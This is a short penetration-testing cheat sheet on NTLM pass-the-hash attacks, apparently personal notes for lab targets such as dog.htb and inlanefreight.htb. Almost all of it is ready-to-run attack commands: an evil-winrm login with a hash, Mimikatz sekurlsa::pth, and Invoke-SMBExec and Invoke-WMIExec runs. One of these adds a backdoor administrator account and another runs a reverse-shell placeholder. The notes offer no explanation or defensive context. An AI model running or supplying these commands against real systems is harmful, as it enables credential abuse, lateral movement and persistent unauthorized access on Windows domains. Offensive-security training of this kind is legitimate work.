# ntlm-pass-the-hash

```
evil-winrm -u tom -H 984958945894594958495 -i dog.htb
```

## Pass-the-hash attack&#x20;

* <https://github.com/Kevin-Robertson/Invoke-TheHash>&#x20;

```
Import-Module .\Invoke-TheHash.psd1 
```

**Mimikatz (windows)**&#x20;

```
mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit
```

```
dir \\dc01\julio
```

**Powershell (windows)**&#x20;

```
Invoke-SMBExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose
```

```
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Command "reverse_shell"
```
